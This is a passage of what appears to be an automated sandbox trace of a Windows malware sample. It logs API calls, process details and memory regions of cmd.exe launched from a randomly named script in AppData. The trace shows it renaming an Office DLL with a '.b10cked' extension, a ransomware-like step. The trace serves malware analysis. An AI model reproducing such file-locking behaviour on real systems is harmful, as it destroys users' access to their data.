13 [0175.240] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0175.240] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0175.240] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0175.240] _wcsicmp (_String1="PROMPT", _String2="RANDOM") 
returned -2 [0175.240] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0175.240] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0175.241] GetEnvironmentStringsW () returned 0x472360* [0175.241] FreeEnvironmentStringsW (penv=0x472360) returned 1 [0175.241] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0175.241] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0175.241] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0175.241] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0175.241] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0175.241] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0175.241] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0175.241] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0175.241] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0175.241] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0175.241] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28f6a8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0175.241] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28f6a8, lpFilePart=0x28f6a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28f6a4*="Desktop") returned 0x18 [0175.241] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0175.241] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f424 | out: lpFindFileData=0x28f424) returned 0x4709f0 [0175.241] FindClose (in: hFindFile=0x4709f0 | out: hFindFile=0x4709f0) returned 1 [0175.242] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f424 | out: lpFindFileData=0x28f424) returned 0x4709f0 [0175.242] 
FindClose (in: hFindFile=0x4709f0 | out: hFindFile=0x4709f0) returned 1 [0175.242] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f424 | out: lpFindFileData=0x28f424) returned 0x4709f0 [0175.242] FindClose (in: hFindFile=0x4709f0 | out: hFindFile=0x4709f0) returned 1 [0175.242] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0175.242] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0175.242] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0175.242] GetEnvironmentStringsW () returned 0x470210* [0175.242] FreeEnvironmentStringsW (penv=0x470210) returned 1 [0175.242] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0175.243] GetConsoleOutputCP () returned 0x1b5 [0175.243] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0175.243] GetUserDefaultLCID () returned 0x409 [0175.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0175.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28f7e8, cchData=128 | out: lpLCData="0") returned 2 [0175.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28f7e8, cchData=128 | out: lpLCData="0") returned 2 [0175.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28f7e8, cchData=128 | out: lpLCData="1") returned 2 [0175.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0175.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0175.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0175.243] GetLocaleInfoW 
(in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0175.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0175.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0175.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0175.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0175.243] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0175.243] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0175.244] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0175.244] GetConsoleTitleW (in: lpConsoleTitle=0x460930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0175.245] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0175.245] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0175.245] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0175.245] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0175.245] _wcsicmp (_String1="move", _String2=")") returned 68 [0175.245] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0175.245] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0175.245] _wcsicmp (_String1="IF", _String2="move") returned -4 [0175.245] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0175.245] _wcsicmp (_String1="REM", _String2="move") returned 5 [0175.245] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0175.249] GetConsoleTitleW (in: lpConsoleTitle=0x28f4e0, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0175.249] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0175.249] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0175.249] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0175.249] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0175.249] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0175.249] _wcsicmp (_String1="move", _String2="CD") returned 10 [0175.249] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0175.249] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0175.249] _wcsicmp (_String1="move", _String2="REN") returned -5 [0175.249] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0175.249] _wcsicmp (_String1="move", _String2="SET") returned -6 [0175.249] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0175.249] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0175.249] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0175.249] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0175.249] _wcsicmp (_String1="move", _String2="MD") returned 11 [0175.249] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0175.249] _wcsicmp (_String1="move", _String2="RD") returned -5 [0175.249] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0175.249] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0175.249] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0175.249] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0175.249] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0175.249] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0175.249] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0175.250] _wcsicmp (_String1="move", _String2="VER") returned -9 [0175.250] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0175.250] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0175.250] _wcsicmp (_String1="move", _String2="SETLOCAL") returned 
-6 [0175.250] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0175.250] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0175.250] _wcsicmp (_String1="move", _String2="START") returned -6 [0175.250] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0175.250] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0175.250] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0175.251] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0175.251] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0175.251] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x28f29c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x28f294, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x28f294*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0175.251] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0175.251] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0175.251] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0175.251] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0175.251] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0175.251] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0175.251] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", 
_MaxCount=0x7) returned -11 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0175.252] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0175.253] _wcsicmp (_String1="XLINTL~1.TRX", _String2=".") returned 74 [0175.253] _wcsicmp 
(_String1="XLINTL~1.TRX", _String2="..") returned 74 [0175.253] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\xlintl~1.trx")) returned 0x2020 [0175.253] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x471f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0175.253] SetErrorMode (uMode=0x0) returned 0x0 [0175.253] SetErrorMode (uMode=0x1) returned 0x0 [0175.253] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x28ec24, lpFilePart=0x28ec0c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~1.TRX", lpFilePart=0x28ec0c*="XLINTL~1.TRX") returned 0x3c [0175.253] SetErrorMode (uMode=0x0) returned 0x1 [0175.253] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0175.253] _wcsicmp (_String1="XLINTL~1.TRX", _String2=".") returned 74 [0175.253] _wcsicmp (_String1="XLINTL~1.TRX", _String2="..") returned 74 [0175.253] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\xlintl~1.trx")) returned 0x2020 [0175.253] SetErrorMode (uMode=0x0) returned 0x0 [0175.253] SetErrorMode (uMode=0x1) returned 0x0 [0175.253] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x28f0a0, lpFilePart=0x28ee38 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~1.TRX", lpFilePart=0x28ee38*="XLINTL~1.TRX") returned 0x3c [0175.253] SetErrorMode (uMode=0x0) returned 0x1 [0175.253] SetErrorMode (uMode=0x0) returned 0x0 [0175.254] SetErrorMode (uMode=0x1) returned 0x0 [0175.254] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x28f2a8, lpFilePart=0x28ee38 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.DLL.trx_dll.b10cked", lpFilePart=0x28ee38*="XLINTL32.DLL.trx_dll.b10cked") returned 0x4c [0175.254] SetErrorMode (uMode=0x0) returned 0x1 [0175.254] SetLastError (dwErrCode=0x0) [0175.254] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\xlintl32.dll.trx_dll.b10cked")) returned 0xffffffff [0175.254] GetLastError () returned 0x2 [0175.254] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x28e7b4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e7b4) returned 0x472130 [0175.254] FindNextFileW (in: hFindFile=0x472130, lpFindFileData=0x28e7b4 | out: lpFindFileData=0x28e7b4) returned 0 [0175.254] GetLastError () returned 0x12 [0175.254] FindClose (in: hFindFile=0x472130 | out: hFindFile=0x472130) returned 1 [0175.255] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x471cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x471cc0) returned 0x472130 [0175.256] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x28ea4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4c [0175.256] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x28ea4c, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.DLL.trx_dll", lpFilePart=0x0) returned 0x44 [0175.256] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\xlintl32.dll.trx_dll")) returned 0x2020 [0175.256] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\xlintl32.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\xlintl32.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0175.256] FindClose (in: hFindFile=0x472130 | out: hFindFile=0x472130) returned 1 [0175.256] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x28ea00 | out: _Buffer=" 1") returned 9 [0175.256] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.256] GetFileType (hFile=0x7) returned 0x2 [0175.332] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0175.332] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28e98c | out: lpMode=0x28e98c) returned 1 [0175.332] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.332] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x28e9c0 | out: lpConsoleScreenBufferInfo=0x28e9c0) returned 1 [0175.332] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0175.333] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x28ea00 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0175.333] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, 
lpNumberOfCharsWritten=0x28e9e4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28e9e4*=0x1a) returned 1 [0175.333] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.333] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0175.333] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.333] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0175.333] _get_osfhandle (_FileHandle=0) returned 0x3 [0175.333] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0175.333] SetConsoleInputExeNameW () returned 0x1 [0175.333] GetConsoleOutputCP () returned 0x1b5 [0175.333] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0175.333] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.334] exit (_Code=0) Process: id = "313" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ca0" os_pid = "0xbf8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "310" os_parent_pid = "0xf68" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24172 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24173 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" 
Region: id = 24174 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24175 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 24176 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 24177 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 24178 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24179 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24180 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 24181 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24182 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24183 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 24184 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 24185 start_va = 0x250000 end_va = 0x2b6fff entry_point = 0x250000 region_type = 
mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24186 start_va = 0x470000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 24187 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 24188 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 24189 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 24190 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24191 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24192 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 24193 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 24194 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = 
"gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 24195 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 24196 start_va = 0x2c0000 end_va = 0x387fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 24197 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 24198 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 24199 start_va = 0x390000 end_va = 0x396fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 24200 start_va = 0x3a0000 end_va = 0x3a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 24201 start_va = 0x3b0000 end_va = 0x3b0fff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 24202 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 24203 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 24204 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 24205 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Region: id = 24206 start_va = 0x769f0000 end_va = 
